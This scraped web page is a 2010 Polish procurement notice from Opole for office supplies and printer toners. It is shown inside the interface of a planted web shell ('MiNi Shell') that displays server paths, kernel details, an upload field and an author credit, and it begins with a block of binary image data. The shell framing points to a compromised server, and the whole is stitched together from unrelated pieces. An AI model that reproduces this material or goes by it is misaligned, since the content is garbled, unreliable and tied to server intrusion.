JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100601/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100601/152948-N-2010.html

<p class="kh_header"><b>Opole: Dostawa materiałów biurowych i materiałów eksploatacyjnych-tonerów do urządzeń drukujących Zamawiającego</b><br>
<b>Numer ogłoszenia: 152948 - 2010; data zamieszczenia: 01.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Opolskie Centrum Rozwoju Gospodarki , ul. Spychalskiego 1a, 45-716 Opole, woj. opolskie, tel. 077 40 33 600, faks 077 40 33 609.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ocrg.opolskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów biurowych i materiałów eksploatacyjnych-tonerów do urządzeń drukujących Zamawiającego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamawiający podzielił zamówienie na dwie części z możliwością składania ofert częsciowych.
Część  1  Materiały biurowe
1.Papier biały 80g/m2 do drukarek, kserokopiarek i urządzeń wielofunkcyjnych, białość CIE 166 format A-4, w ryzach po 500 sztuk.	ryza	1380
2.Papier biały laser, satynowana powierzchnia, 200g/m2 , białość CIE 161, do drukarek i urządzeń wielofunkcyjnych, w ryzach po 250 kartek 	ryza	25
2.Segregator A-4 laminowany, szerokość grzbietu 25 mm, zwiększona pojemność, oklejony  na zewnątrz poliolefiną, dwustronna wymienna etykieta na grzbiecie, na dolnych krawędziach metalowe okucia - kolor czerwony.	Sztuk	25
3.Segregator A-4 laminowany, szerokość grzbietu 25 mm, zwiększona pojemność, oklejony  na zewnątrz poliolefiną, dwustronna wymienna etykieta na grzbiecie, na dolnych krawędziach metalowe okucia - kolor zielony.	sztuk	25
4.Segregator A-4 laminowany, szerokość grzbietu 25 mm, zwiększona pojemność, oklejony  na zewnątrz poliolefiną, dwustronna wymienna etykieta na grzbiecie, na dolnych krawędziach metalowe okucia - kolor czarny.	Sztuk	25
5.Segregator A-4 laminowany, szerokość grzbietu 75 mm, zwiększona pojemność, oklejony  na zewnątrz poliolefiną, dwustronna wymienna etykieta na grzbiecie, na dolnych krawędziach metalowe okucia - kolor czerwony.	Sztuk	25
6.Segregator A-4 laminowany, szerokość grzbietu 75 mm, zwiększona pojemność, oklejony  na zewnątrz poliolefiną, dwustronna wymienna etykieta na grzbiecie, na dolnych krawędziach metalowe okucia - kolor nieb ieski.	Sztuk	25
7.Koszulki A-4 z klapką, wykonane z mocnego PCV, pasujące do każdego segregatora, w opakowaniach po 25 szt.	opakowań	22
8.Koszulki foliowe A-4 pasujące do każdego segregatora w opakowaniach po 100 sztuk	opakowań	26
9.Skoroszyty A-4  z PCV , zawieszane, przednia okładka przeźroczysta, tylna  kolorowa, papierowy wysuwany pasek opisowy, w opakowaniach po 10 sztuk w kolorach: czerwony, czarny, niebieski.	Opakowań	25
10.Kalkulator z funkcją: obliczania marzy, zaokrąglania wyników, przeliczania walut, klawiszy cofania, klawisz zmiany znaku+/- , klawisz podwójnego zera . Wymiary kalkulatora nie mniejsze niż 138 X 150 X 35mm.	Sztuk	15
11.Wąsy do skoroszytu z polipropylenu, z metalową blaszką, kolorowe, w opakowaniach po 25 sztuk.	Opakowań	104
12.Płyty CD-RW 700 MB  w opakowaniach po 100 sztuk	opakowań	8
13.Karteczki samoprzylepne 38X51mm, kolorowe, opakowanie 12 bloczków X 100 kartek	opakowań	48
14.Karteczki samoprzylepne 76X76mm, kolorowe, opakowanie 6 bloczków X 100 kartek	opakowań	50
15.Znaczki samoprzylepne 15X50mm, kolorowe, opakowanie 5 bloczków X 100 kart	opakowań	40
16.Separatory kartonowe kolorowe 1/3 A4	opakowań	100
17.Zakreślacz  o szerokości linii zakreślania 2,5mm kolor żółty 	sztuk	20
18.Zakreślacz  o szerokości linii zakreślania 2,5mm kolor zielony	sztuk	23
19.Zakreślacz  o szerokości linii zakreślania 2,5mm kolor pomarańczowysztuk	33
20.Klipsy do papieru 32mm w opakowaniach po 12 szt	opakowanie	54
21.Klipsy do papieru 51mm w opakowaniach po 12 szt	opakowanie	34
22.Klipsy do papieru 19mm w opakowaniach po 12 szt	opakowanie	74
23.Cienkopis Stabilo Point 88 kolor czerwony lub równoważny o szerokości linii pisania nie większej niż 0,4mm i nie mniejszej długości linii pisania	sztuk	25
24.Cienkopis Stabilo Point 88 kolor czarny  lub równoważny o szerokości linii pisania nie większej niż 0,4mm i nie mniejszej długości linii pisania	sztuk	20
25.Cienkopis Stabilo Point 88 kolor zielony  lub równoważny o szerokości linii pisania nie większej niż 0,4mm i nie mniejszej długości linii pisania	sztuk	20
26.Cienkopis Stabilo Point 88 kolor niebieski  lub równoważny o szerokości linii pisania nie większej niż 0,4mm i nie mniejszej długości linii pisania	sztuk	25
27.Półka na dokumenty przeźroczysta z wytrzymałego plastiku, z możliwością łączenia półek pionowo i pod skosem	sztuk	50
28.Nożyczki ostrze 14 cm, wykonane ze stali nierdzewnej	sztuk	15
29.Przybornik na biurko o wymiarach nie mniejszych niż   147X100X100mm, z przeźroczystego tworzywa akrylowego odporny na pęknięcia	sztuk	15
30.Ołówek drewniany z gumką HB	sztuk	105
31.Skoroszyt do akt osobowych 22X31X2cm, kolor niebieski	sztuk	50
32.Gumka do mazania wielkość średnia	sztuk	18
33.Zszywki 24/6	opakowań	209
34.Zakładki indeksujące w opakowaniach po 4 kolory po 35 szt.	opakowań 	20
35.Zakładki indeksujące samoprzylepne kolory neonowe, wymiary 12X43mm, w opakowaniach  4X35 szt	opakowań	60
36.Długopisy BIC, końcówka 0,5mm lub równoważny o końcówce nie większej niż 0,5mm i długości linii pisania nie mniejszej niż 3000m-kolor czerwony. 	Sztuk	100
37.Długopisy BIC, końcówka 0,5mm lub równoważny o końcówce nie większej niż 0,5mm i długości linii pisania nie mniejszej niż 3000m-kolor zielony.	sztuk	100
38.Długopisy BIC, końcówka 0,5mm lub równoważny o końcówce nie większej niż 0,5mm i długości linii pisania nie mniejszej niż 3000m-kolor niebieski	sztuk	100
39.Dziurkacz  wykonany z metalu, z ogranicznikami formatu A4, A5, A6.	Sztuk	12
40.Klej biurowy o pojemności 20-40g, w sztyfcie	sztuk	101
41.Zszywacz o metalowej konstrukcji, o jednorazowym zszyciu nie mniej niż 25 kartek, o możliwości zszywania do wewnątrz i na zewnątrz, o pojemności magazynka nie mniejszej niż 100 zszywek.	Sztuk	22
42.Zszywacz super mocny z systemem płaskiego zaginania 
zszywek zmniejszający o 30% objętość zszywanych  dokumentów, z antypoślizgową podstawą, z pojemnością magazynka 120X23/15XL, z kompletem 1000 zszywek	sztuk	2
43.Zszywki 23/15/XL, zszywające maksymalnie 120 kart, 
w opakowaniach po 1000 szt	opakowanie	20
44.Taśma pakowa cichoodwijalna 50mmX66m	sztuk	24
45.Linijka 30cm	sztuk	22
46.Taśma biurowa 24mm w opakowaniach po 6 szt.	opakowań 	4
47.Przekładki kartonowe, kolorowy mocny karton, pasujące do każdego segregatora 10X23,5cm, w opakowaniach po 100szt.	opakowań	34
48.Teczka kartonowa A-4, z gumką - kolorowe, szerokość
 10 mm	sztuk	30
49.Tusz do stempli gumowych, niebieski, uniwersalny, 
szybko schnący o pojemności 50 ml	sztuk	21
50.Nożyczki satynowe-ostrze 15,5cm	sztuk	12
51.Taśma samoprzylepna krystalicznicznie przeźroczysta19mmx7,5m sztuk	30
52.Spinacz okrągły długość 28mm 100 sztuk w opakowaniu opakowań 	210
53.Spinacz długości 50mm 100 sztuk w opakowaniu 	opakowań 	210
54.Rozszywacz	sztuk	22
55.Temperówki z pojemnikiem średnie	sztuk	20
56.Marker do opisywania płyt DVD kolor czarny, grubość linii 1 mm	sztuk	25
57.Korektor w płynie na bazie wody, bezzapachowy 20ml, z gąbeczka do rozprowadzania fluidu	sztuk	35
58.Korektor w piórze, szybkoschnący, grubość linii 1,2mm	sztuk	5
59.Skoroszyt pcv A-4, z przeźroczystym przodem, miękki, 
grubości 200? tył, pojemność 2 cm, format 232X314,
kolorowe, w opakowaniach po 10 szt	sztuk	120
60.Skoroszyt kartonowy hakowy pełny A-4 czerwony	sztuk	50
61.Koperty białe b4, opakowanie 250 szt	opakowań 	4
62.Koperty białe b5, opakowanie 500 szt	opakowań	2
63.Koperty białe c4, opakowanie 1000 szt	opakowań	3
64.Koperty c6, opakowanie 1000 szt	opakowań	5
65.Etykiety samoprzylepne na płyty CD, 100 arkuszy 
w opakowaniu-2 etykiety na arkuszu	opakowań 	11
66.Etykiety samoprzylepne na adresowanie kopert 24
 na arkuszu-opakowanie 100 arkuszy	opakowań	15
67.Grzbiety plastikowe do bindowania 6mm białe-100szt 
w opakowaniu	opakowań	11
68.Grzbiety plastikowe do bindowania 14mm białe-100szt 
w opakowaniu	opakowań	11
69.Okładki do bindowaniaA-4 250g jednostronnie kolorowe 
błyszczące, czarne w opakowaniach 100 szt.	opakowań	16
70.Folia bezbarwna do bindowaniaA-4  200 mic 
 w opakowaniach 100 szt	opakowań	11
71.Pen driver 8 GB	sztuk	25
72.Kosz na śmieci siateczkowy 15 litrów	sztuk	13
73.Teczka-pudło, z gumką , wykonana z kolorowego polipropylenu, zamykana na gumkę szerokość grzbietu 2 cm	sztuk 	40
74.Pióro żelowe INDEST lub równoważne, o szerokości linii 0,3mm, kolor tuszu niebieski	sztuk	100
75.Długopis  automatyczny Zenith , z wymiennym wkładem, kolor tuszu niebieski, szerokość linii pisania 0,6-0,7mm	sztuk	100
76.Wkłady do długopisu Zenith	sztuk	100
77.Kostka biurowa biała-wkład do pojemnika  8,5X8,5X8,5cm	sztuk	20
78.Długopis automatyczny Pentel z gumowym uchwytem lub równoważny, wymienny wkład kolor niebieski	sztuk	100
79.Długopis automatyczny Pentel z gumowym uchwytem lub równoważny, wymienny wkład kolor czerwony	sztuk	100
80.Długopis automatyczny Pentel z gumowym uchwytem
lub równoważny, wymienny wkład kolor czarny	sztuk	100
81.Teczki tekturowe A-4 lakierowane z gumką	sztuk	100
82.Pióro żelowe automatyczne RYSTAR lub równoważne, o szerokości linii pisania 0,3mm, wymienny wkład-kolor tuszu niebieski	sztuk	100
83.Ekologiczny papier ksero A-4/80g , skład 100% recyklingowany, odpowiedni do wszystkich rodzajów drukarek, w ryzach po 500 arkuszy	ryz	150

Wykonawca, który zaoferuje artykuły równoważne w pozycjach, w których Zamawiający stosuje do opisu zamówienia nazwę artykułu, jest obowiązany wskazać w kolumnie drugiej formularza ofertowego nazwę artykułu równoważnego . 

Część 2: Dostawa materiałów eksploatacyjnych-tonerów
Wskazanie sprzętu zamawiającego, do którego wymagany jest toner
1.Drukarka HP Color LaserJet 2605 dtn czarny	sztuk 25
2.jak wyżej -cyan	sztuk 20
3.jak wyżej -yellow sztuk 20
4.jak wyżej -magenta sztuk	20
5.Drukarka Hp Laser P2015 dn czarny	sztuk 27
6.Kserokopiarka SHARP MX 230 ON czarny	sztuk 15
7.Kserokopiarka-urządzenie wielofunkcyjne SHARP MX 230 ON cyan	sztuk 1
8.jak wyżej-magenta sztuk 4
9.jak wyżej-yellow sztuk 4
10.Kserokopiarka-urządzenie wielofunkcyjne HP LaserJet CM232fxi MFP CC532A żółty sztuk1
11.Kserokopiarka-urządzenie wielofunkcyjne HP LaserJet CM232fxi MFP CC530A czarny	sztuk 1
12.Kserokopiarka-urządzenie wielofunkcyjne HP LaserJet
CM232fxi MFP CC531A niebieski sztuk	1
13.Kserokopiarka-urządzenie wielofunkcyjne HP LaserJet CM232fxi MFP CC533A czerwony	 sztuk 1
14.Faks Canon Fax-1 220 sztuk 1
15.Kserokopiarka-urządzenie wielofunkcyjne CANON iRC 3580i-magenta sztuk	1
16.Kserokopiarka-urządzenie wielofunkcyjne iRC 3580i-cyan sztuk	1
17.Kserokopiarka-urządzenie wielofunkcyjne iRC 3580i-black sztuk	2
18.Kserokopiarka-urządzenie wielofunkcyjne iRC 3580i-yellow sztuk	1
19.Kserokopiarka-urządzenie wielofunkcyjne bizhub C253 Konica Minolta-toner żółty	sztuk 1
20.Kserokopiarka-urządzenie wielofunkcyjne bizhub C253 Konica Minolta-toner niebieski sztuk 1
21.Kserokopiarka-urządzenie wielofunkcyjne bizhub C253 Konica Minolta-toner czarny sztuk 2
22.Kserokopiarka-urządzenie wielofunkcyjne bizhub C253 Konica Minolta-toner czerwony	 sztuk1
23.Kserokopiarka YTAX CD 1230 sztuk	1
24.Brother fax 1360 sztuk 2
25.Urządzenie wielofunkcyjne Brother 2920-toner TN-2000 sztuk	2
26.Drukarka HP LaserJet P2055dn black sztuk	3
27.Drukarka HP LaserJetCP2025dn black sztuk	4
28.Drukarka HP LaserJetCP2025dn yellow sztuk	4
29.Drukarka HP LaserJetCP2025dn magenta sztuk 4
30.Drukarka HP LaserJetCP2025dn cyan sztuk 4
31.Kserokopiarka Kyocera Mita Vi 230 sztuk 3


1.W celu zapewnienia idealnego dostosowania tonerów do sprzętu Zamawiającego, w szczególności zapewnienia ostrych wydruków i optymalnych żywotności akcesoriów sprzętu, Zamawiający wymaga dostawy tonerów wyprodukowanych przez producentów sprzętu wskazanego w powyższej tabeli.
2.Wykonawca powołujący się na rozwiązania równoważne jest zobowiązany udokumentować w ofercie równoważność poprzez załączenie dokumentu wystawionego przez producenta sprzętu wymienionego w powyższej tabeli, w którym stwierdzi on równoważność w stosunku do swojego produktu.
3.Tonery innych producentów dedykowane do danego sprzętu, lecz nie posiadające dokumentu, o którym wyżej mowa, będą traktowane przez Zamawiającego jako zamienniki.
4.Zamawiający nie będzie badał na swoim sprzęcie równoważności zamienników w stosunku do tonerów producentów sprzętu, zatem oferta Wykonawcy zawierająca zamienniki będzie traktowana jako nie odpowiadająca specyfikacji istotnych warunków zamówienia i na podstawie art. 89 ust.1 pkt 2 Prawa będzie odrzucona.
5.Tonery wyprodukowane przez producentów sprzętu wskazanego w powyższej tabeli są dla Wykonawców powszechnie dostępne..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 30.19.21.13-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żada wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się możliwość zmian postanowień zawartych w umowie w przypadku:
zmiany przepisów prawnych mających wpływ na cenę umowy, a w szczególności zmiany podatku VAT lub wprowadzenia akcyzy,
zmiany nazwy, adresu firmy, spowodowane zmianą formy organizacyjno - prawnej, przekształceniem lub połączeniem z inną firmą,
zmiany osób przewidzianych do kontaktów zarówno ze strony Zamawiającego jak 
i Wykonawcy,
wystąpienia ograniczeń dostępności artykułów wymienionych w ofercie lub wycofanie z rynku tych artykułów, powodujące konieczność wymiany na artykuły równoważne,
wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, w szczególności zagrażającym bezpośrednio życiu lub zdrowiu ludzi,
działań osób trzecich uniemożliwiających wykonanie dostaw, które to działania nie są konsekwencją winy którejkolwiek Strony umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ocrg.opolskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Opolskie Centrum Rozwoju Gospodarki ul. Spychalskiego 1A. 45-716 Opole , w sekretariacie na III piętrze..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.06.2010 godzina 09:00, miejsce: Opolskie Centrum Rozwoju Gospodarki ul. Spychalskiego 1A. 45-716 Opole , lub składać w sekretariacie na III piętrze..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zakup współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com